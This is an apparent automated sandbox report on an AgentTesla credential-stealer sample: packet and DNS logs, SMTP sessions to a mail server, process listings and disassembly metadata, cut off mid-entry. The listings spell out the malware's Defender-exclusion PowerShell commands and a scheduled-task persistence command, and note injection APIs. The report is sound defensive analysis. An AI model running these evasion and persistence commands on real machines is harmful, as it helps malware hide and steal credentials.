Feb 12, 2024 20:39:19.039010048 CET	49735	587	192.168.2.5	208.91.198.143
Feb 12, 2024 20:39:19.215333939 CET	587	49735	208.91.198.143	192.168.2.5
Feb 12, 2024 20:39:19.215611935 CET	49735	587	192.168.2.5	208.91.198.143
Feb 12, 2024 20:39:19.367778063 CET	587	49735	208.91.198.143	192.168.2.5
Feb 12, 2024 20:39:19.368727922 CET	49735	587	192.168.2.5	208.91.198.143
Feb 12, 2024 20:39:19.368864059 CET	49735	587	192.168.2.5	208.91.198.143
Feb 12, 2024 20:39:19.368901014 CET	49735	587	192.168.2.5	208.91.198.143
Feb 12, 2024 20:39:19.368948936 CET	49735	587	192.168.2.5	208.91.198.143
Feb 12, 2024 20:39:19.519959927 CET	587	49735	208.91.198.143	192.168.2.5
Feb 12, 2024 20:39:19.520780087 CET	587	49735	208.91.198.143	192.168.2.5
Feb 12, 2024 20:39:19.644428015 CET	587	49735	208.91.198.143	192.168.2.5
Feb 12, 2024 20:39:19.686647892 CET	49735	587	192.168.2.5	208.91.198.143
Feb 12, 2024 20:40:02.515002012 CET	49728	80	192.168.2.5	208.95.112.1
Feb 12, 2024 20:40:02.630494118 CET	80	49728	208.95.112.1	192.168.2.5
Feb 12, 2024 20:40:02.630595922 CET	49728	80	192.168.2.5	208.95.112.1
Feb 12, 2024 20:40:06.339560032 CET	49732	80	192.168.2.5	208.95.112.1
Feb 12, 2024 20:40:06.456722021 CET	80	49732	208.95.112.1	192.168.2.5
Feb 12, 2024 20:40:06.456792116 CET	49732	80	192.168.2.5	208.95.112.1
Feb 12, 2024 20:40:52.530632973 CET	49729	587	192.168.2.5	208.91.198.143
Feb 12, 2024 20:40:52.682005882 CET	587	49729	208.91.198.143	192.168.2.5
Feb 12, 2024 20:40:52.682586908 CET	587	49729	208.91.198.143	192.168.2.5
Feb 12, 2024 20:40:52.682684898 CET	49729	587	192.168.2.5	208.91.198.143
Feb 12, 2024 20:40:52.688355923 CET	49729	587	192.168.2.5	208.91.198.143
Feb 12, 2024 20:40:56.343368053 CET	49735	587	192.168.2.5	208.91.198.143
Feb 12, 2024 20:40:56.495598078 CET	587	49735	208.91.198.143	192.168.2.5
Feb 12, 2024 20:40:56.496155024 CET	587	49735	208.91.198.143	192.168.2.5
Feb 12, 2024 20:40:56.496226072 CET	49735	587	192.168.2.5	208.91.198.143
Feb 12, 2024 20:40:56.501081944 CET	49735	587	192.168.2.5	208.91.198.143

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 12, 2024 20:39:11.373461008 CET	57901	53	192.168.2.5	1.1.1.1
Feb 12, 2024 20:39:11.492419004 CET	53	57901	1.1.1.1	192.168.2.5
Feb 12, 2024 20:39:12.509649992 CET	55334	53	192.168.2.5	1.1.1.1
Feb 12, 2024 20:39:12.630139112 CET	53	55334	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Feb 12, 2024 20:39:11.373461008 CET	192.168.2.5	1.1.1.1	0x2964	Standard query (0)	ip-api.com	A (IP address)	IN (0x0001)	false
Feb 12, 2024 20:39:12.509649992 CET	192.168.2.5	1.1.1.1	0x1ab7	Standard query (0)	us2.smtp.mailhostbox.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Feb 12, 2024 20:39:02.813265085 CET	1.1.1.1	192.168.2.5	0x3b70	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Feb 12, 2024 20:39:02.813265085 CET	1.1.1.1	192.168.2.5	0x3b70	No error (0)	fp2e7a.wpc.phicdn.net		192.229.211.108	A (IP address)	IN (0x0001)	false
Feb 12, 2024 20:39:11.492419004 CET	1.1.1.1	192.168.2.5	0x2964	No error (0)	ip-api.com		208.95.112.1	A (IP address)	IN (0x0001)	false
Feb 12, 2024 20:39:12.630139112 CET	1.1.1.1	192.168.2.5	0x1ab7	No error (0)	us2.smtp.mailhostbox.com		208.91.198.143	A (IP address)	IN (0x0001)	false
Feb 12, 2024 20:39:12.630139112 CET	1.1.1.1	192.168.2.5	0x1ab7	No error (0)	us2.smtp.mailhostbox.com		208.91.199.225	A (IP address)	IN (0x0001)	false
Feb 12, 2024 20:39:12.630139112 CET	1.1.1.1	192.168.2.5	0x1ab7	No error (0)	us2.smtp.mailhostbox.com		208.91.199.224	A (IP address)	IN (0x0001)	false
Feb 12, 2024 20:39:12.630139112 CET	1.1.1.1	192.168.2.5	0x1ab7	No error (0)	us2.smtp.mailhostbox.com		208.91.199.223	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

ip-api.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49728	208.95.112.1	80	7276	C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe

Timestamp	Bytes transferred	Direction	Data
Feb 12, 2024 20:39:11.646333933 CET	80	OUT	GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
Feb 12, 2024 20:39:11.763645887 CET	174	IN	HTTP/1.1 200 OK Date: Mon, 12 Feb 2024 19:39:11 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 5 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44 Data Raw: 74 72 75 65 0a Data Ascii: true

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49732	208.95.112.1	80	7708	C:\Users\user\AppData\Roaming\lnYkIr.exe

Timestamp	Bytes transferred	Direction	Data
Feb 12, 2024 20:39:15.411724091 CET	80	OUT	GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
Feb 12, 2024 20:39:15.529270887 CET	174	IN	HTTP/1.1 200 OK Date: Mon, 12 Feb 2024 19:39:15 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 5 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44 Data Raw: 74 72 75 65 0a Data Ascii: true

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Feb 12, 2024 20:39:15.501027107 CET	587	49729	208.91.198.143	192.168.2.5	220 us2.outbound.mailhostbox.com ESMTP Postfix
Feb 12, 2024 20:39:15.501266003 CET	49729	587	192.168.2.5	208.91.198.143	EHLO 141700
Feb 12, 2024 20:39:15.652388096 CET	587	49729	208.91.198.143	192.168.2.5	250-us2.outbound.mailhostbox.com 250-PIPELINING 250-SIZE 41648128 250-VRFY 250-ETRN 250-STARTTLS 250-AUTH PLAIN LOGIN 250-AUTH=PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250-DSN 250 CHUNKING
Feb 12, 2024 20:39:15.652601957 CET	49729	587	192.168.2.5	208.91.198.143	STARTTLS
Feb 12, 2024 20:39:15.803988934 CET	587	49729	208.91.198.143	192.168.2.5	220 2.0.0 Ready to start TLS
Feb 12, 2024 20:39:17.626324892 CET	587	49735	208.91.198.143	192.168.2.5	220 us2.outbound.mailhostbox.com ESMTP Postfix
Feb 12, 2024 20:39:17.626918077 CET	49735	587	192.168.2.5	208.91.198.143	EHLO 141700
Feb 12, 2024 20:39:17.778377056 CET	587	49735	208.91.198.143	192.168.2.5	250-us2.outbound.mailhostbox.com 250-PIPELINING 250-SIZE 41648128 250-VRFY 250-ETRN 250-STARTTLS 250-AUTH PLAIN LOGIN 250-AUTH=PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250-DSN 250 CHUNKING
Feb 12, 2024 20:39:17.778584957 CET	49735	587	192.168.2.5	208.91.198.143	STARTTLS
Feb 12, 2024 20:39:17.929697990 CET	587	49735	208.91.198.143	192.168.2.5	220 2.0.0 Ready to start TLS

Target ID:	0
Start time:	20:39:07
Start date:	12/02/2024
Path:	C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe
Imagebase:	0x8e0000
File size:	743'424 bytes
MD5 hash:	2D291BAEDB79EE55DAA67417103F0905
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2146302322.000000000400E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2146302322.000000000400E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	20:39:08
Start date:	12/02/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe
Imagebase:	0xeb0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	20:39:08
Start date:	12/02/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	20:39:08
Start date:	12/02/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lnYkIr.exe
Imagebase:	0xeb0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	20:39:08
Start date:	12/02/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	20:39:08
Start date:	12/02/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lnYkIr" /XML "C:\Users\user\AppData\Local\Temp\tmp9C71.tmp
Imagebase:	0x350000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	20:39:08
Start date:	12/02/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	20:39:09
Start date:	12/02/2024
Path:	C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe
Imagebase:	0xf00000
File size:	743'424 bytes
MD5 hash:	2D291BAEDB79EE55DAA67417103F0905
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.3368803671.00000000032AB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.3368803671.0000000003287000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.3368803671.0000000003261000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.3368803671.0000000003261000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.3365723059.0000000000437000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	20:39:10
Start date:	12/02/2024
Path:	C:\Users\user\AppData\Roaming\lnYkIr.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\lnYkIr.exe
Imagebase:	0xe20000
File size:	743'424 bytes
MD5 hash:	2D291BAEDB79EE55DAA67417103F0905
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.2187787442.000000000441F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.2187787442.000000000441F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 29%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	20:39:11
Start date:	12/02/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff6ef0c0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	20:39:13
Start date:	12/02/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lnYkIr" /XML "C:\Users\user\AppData\Local\Temp\tmpADC6.tmp
Imagebase:	0x350000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	20:39:13
Start date:	12/02/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	20:39:13
Start date:	12/02/2024
Path:	C:\Users\user\AppData\Roaming\lnYkIr.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\lnYkIr.exe
Imagebase:	0x7c0000
File size:	743'424 bytes
MD5 hash:	2D291BAEDB79EE55DAA67417103F0905
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.3368762224.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.3368762224.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.3368762224.0000000002C37000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.3368762224.0000000002C5B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	11.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	9.4%
Total number of Nodes:	331
Total number of Limit Nodes:	17

Executed Functions

Function 052B79E8 Relevance: 26.5, Strings: 20, Instructions: 1505
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

K, xrefs: 052B8754
0, xrefs: 052B89AF
L, xrefs: 052B88E7
>, xrefs: 052B8C7C
#, xrefs: 052B85A7
K, xrefs: 052B84D7
i, xrefs: 052B8823
0, xrefs: 052B8AC1
@, xrefs: 052B89A5
@, xrefs: 052B807F
0, xrefs: 052B8086
L, xrefs: 052B8E4C
o, xrefs: 052B8D94
@, xrefs: 052B8AB7
0, xrefs: 052B8F4C
0, xrefs: 052B8E56
@, xrefs: 052B8F42
', xrefs: 052B8242
4'jq, xrefs: 052B936F
O, xrefs: 052B83F5

Memory Dump Source

Source File: 00000000.00000002.2147454333.00000000052B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_52b0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: #$'$0$0$0$0$0$4'jq$>$@$@$@$@$K$K$L$L$O$i$o
API String ID: 0-2568456975
Opcode ID: 03e662f1c3cd1c5cf1c3d2723bcbd5df7b13312a3c06f72d52b5c0d3b99f0e2e
Instruction ID: 065969afd3cd0a30399ed6910f8b54f0de7a5a698b09c44bba91542d9639b79b
Opcode Fuzzy Hash: 03e662f1c3cd1c5cf1c3d2723bcbd5df7b13312a3c06f72d52b5c0d3b99f0e2e
Instruction Fuzzy Hash: 06F22634A20315CFDB15EF24C894AD9B7B2FF89300F6442E9D8096B365DB75AA85CF90

Uniqueness

Uniqueness Score: -1.00%

Function 052B79D8 Relevance: 25.2, Strings: 19, Instructions: 1459
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

K, xrefs: 052B8754
0, xrefs: 052B89AF
L, xrefs: 052B88E7
>, xrefs: 052B8C7C
#, xrefs: 052B85A7
K, xrefs: 052B84D7
i, xrefs: 052B8823
0, xrefs: 052B8AC1
@, xrefs: 052B89A5
@, xrefs: 052B807F
0, xrefs: 052B8086
L, xrefs: 052B8E4C
o, xrefs: 052B8D94
@, xrefs: 052B8AB7
0, xrefs: 052B8F4C
0, xrefs: 052B8E56
@, xrefs: 052B8F42
', xrefs: 052B8242
O, xrefs: 052B83F5

Memory Dump Source

Source File: 00000000.00000002.2147454333.00000000052B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_52b0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: #$'$0$0$0$0$0$>$@$@$@$@$K$K$L$L$O$i$o
API String ID: 0-2994534767
Opcode ID: 21509a6673a7c1f72ac3c78d4dafa5a9bafa34cffe56b7a7b296a48095a8df24
Instruction ID: 22ebe85868ae99dd75d2d908bfde4773e27c4c274c6100ba07b112974c106efd
Opcode Fuzzy Hash: 21509a6673a7c1f72ac3c78d4dafa5a9bafa34cffe56b7a7b296a48095a8df24
Instruction Fuzzy Hash: 8EF21634A10215CFDB15EF24C894AD9B7B2FF8A300F6442F9D8096B365DB75AA85CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0B7F0040 Relevance: .2, Instructions: 184COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2149731358.000000000B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b7f0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e2c39464cafa6034c4600e7de505e69a7b607d0ef13e5c007d049d875f2e5eb
Instruction ID: dfdd2bb4fa61c164c116b9ca451ce00d53d8b744f7da8441a5b7f6adffb2cdb5
Opcode Fuzzy Hash: 6e2c39464cafa6034c4600e7de505e69a7b607d0ef13e5c007d049d875f2e5eb
Instruction Fuzzy Hash: 9E71E571D45229CBEB28CF66C8447EDBBFABF89300F10D1AAD518A6351EB705A85CF44

Uniqueness

Uniqueness Score: -1.00%

Function 0B7F0422 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2149731358.000000000B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b7f0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07048e53649033d6834f6d14bf15d88f4d85def333c6ea6b9b32985b2d95b64e
Instruction ID: bb63469e4bb004ec56f26a16d9eaff88097ff26dd3c05c77119b6c0c63ce9b8a
Opcode Fuzzy Hash: 07048e53649033d6834f6d14bf15d88f4d85def333c6ea6b9b32985b2d95b64e
Instruction Fuzzy Hash: B7E086B484D246DFCB51DF6495445F47FBCAB07604F002085E469A7313D9314941DF19

Uniqueness

Uniqueness Score: -1.00%

Function 070EC424 Relevance: 1.8, APIs: 1, Instructions: 252
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 070EC666

Memory Dump Source

Source File: 00000000.00000002.2148191129.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70e0000_SecuriteInfo.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 2a59a9de868544b5ae5e7456cc1d41b86a68522dfecf5bd9a3d435ece1bda1c2
Instruction ID: a836d2c67973e3a4e465a597155a2b211b00549b195d7ab0295574a6e529c43b
Opcode Fuzzy Hash: 2a59a9de868544b5ae5e7456cc1d41b86a68522dfecf5bd9a3d435ece1bda1c2
Instruction Fuzzy Hash: 6CA15FB1D00219CFEB54CF68C841BEEBBF6BF48310F1482A9D859A7250DB759985CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 070EC430 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 070EC666

Memory Dump Source

Source File: 00000000.00000002.2148191129.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70e0000_SecuriteInfo.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: c6a98dccf8c4de418004d4af440ef798c3ecf2dfd6ae5d707130d421b978ec9f
Instruction ID: 9b93f4ebe370799c222541caf08736ed2245cb0301183c38ce73a8892a50aa73
Opcode Fuzzy Hash: c6a98dccf8c4de418004d4af440ef798c3ecf2dfd6ae5d707130d421b978ec9f
Instruction Fuzzy Hash: 21915FB1D00219CFEB54CF69C840BEEBBF6BF48310F1482A9D859A7250DB759985CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 052B2A04 Relevance: 1.6, APIs: 1, Instructions: 118
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 052B2B22

Memory Dump Source

Source File: 00000000.00000002.2147454333.00000000052B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_52b0000_SecuriteInfo.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 134be40a917a73d81e4436899cd89494fb4bc6242c5492ab9b164d68d0f58db6
Instruction ID: a6f487ecc7f78e15e7a98d7e2ef1559fbd08c033c57c020236ef1ed5bf58a4b7
Opcode Fuzzy Hash: 134be40a917a73d81e4436899cd89494fb4bc6242c5492ab9b164d68d0f58db6
Instruction Fuzzy Hash: F251C2B5D10349DFDB14CFAAC884ADEBBB1BF48350F24852AE819AB210D7759845CF90

Uniqueness

Uniqueness Score: -1.00%

Function 052B17D0 Relevance: 1.6, APIs: 1, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 052B2B22

Memory Dump Source

Source File: 00000000.00000002.2147454333.00000000052B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_52b0000_SecuriteInfo.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 1dac300b91cf8dd537d7feda1a3f955addaa3828ed02c97ca838d6cc95f92d81
Instruction ID: d4303bf854177b4e32ada7c75cab938bbb3c8d49debd26b4d77b3f06dc7ffbd2
Opcode Fuzzy Hash: 1dac300b91cf8dd537d7feda1a3f955addaa3828ed02c97ca838d6cc95f92d81
Instruction Fuzzy Hash: A051D0B5D10349DFDB14CF9AC884ADEBBF5BF48350F24852AE819AB210D7B5A841CF90

Uniqueness

Uniqueness Score: -1.00%

Function 02BF5D44 Relevance: 1.6, APIs: 1, Instructions: 100
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 02BF5E01

Memory Dump Source

Source File: 00000000.00000002.2144315872.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2bf0000_SecuriteInfo.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 92ce69f01f469ed2f5386fd0d64ad572886310cdeec1b54d68db113872401ec6
Instruction ID: a4508f2b6c2a1ed83b7f0731059e7ad5db911498e88f1df3428c9d1dac60a5ec
Opcode Fuzzy Hash: 92ce69f01f469ed2f5386fd0d64ad572886310cdeec1b54d68db113872401ec6
Instruction Fuzzy Hash: 7441E3B0C00719CFEB25CFA9C884B8EBBB5BF49304F14819AD509AB255DB756949CF90

Uniqueness

Uniqueness Score: -1.00%

Function 052B1924 Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 052B50A1

Memory Dump Source

Source File: 00000000.00000002.2147454333.00000000052B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_52b0000_SecuriteInfo.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 958930960b5050c9c9b4ac97a7b4b08c17375d62109f8dcf5e58a957f6aca259
Instruction ID: ed7384ca4318955888e57dec5b2b2d58f68ad3a29e46f54e4509260a26362a96
Opcode Fuzzy Hash: 958930960b5050c9c9b4ac97a7b4b08c17375d62109f8dcf5e58a957f6aca259
Instruction Fuzzy Hash: 8B4108B4A10245CFDB14DF99C488AAABBF5FF8C314F24C859D519AB321D7B5A841CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 02BF4518 Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 02BF5E01

Memory Dump Source

Source File: 00000000.00000002.2144315872.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2bf0000_SecuriteInfo.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 58208221b175156ec7dae16c437abfc87f6b3f3291747e40469e4ff1619298f0
Instruction ID: 0bac62b2f0a66b91a0760e09fb907feac1ad4e178e5406a64f14e48727ca6b8d
Opcode Fuzzy Hash: 58208221b175156ec7dae16c437abfc87f6b3f3291747e40469e4ff1619298f0
Instruction Fuzzy Hash: 1941E2B0C0061DCBDB24DFA9C884B9EBBF5BF48304F60806AD509AB255DBB56949CF90

Uniqueness

Uniqueness Score: -1.00%

Function 070EC1A1 Relevance: 1.6, APIs: 1, Instructions: 72injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 070EC238

Memory Dump Source

Source File: 00000000.00000002.2148191129.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70e0000_SecuriteInfo.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 58c9fe9c4fb235ac1b8fca8d970ff9aa055442ed273ac59e60ff5696ffd26966
Instruction ID: 0df23c69592d5f8135d9ab0fadec344027e4fca0eaa17afd9fbaac98dc435749
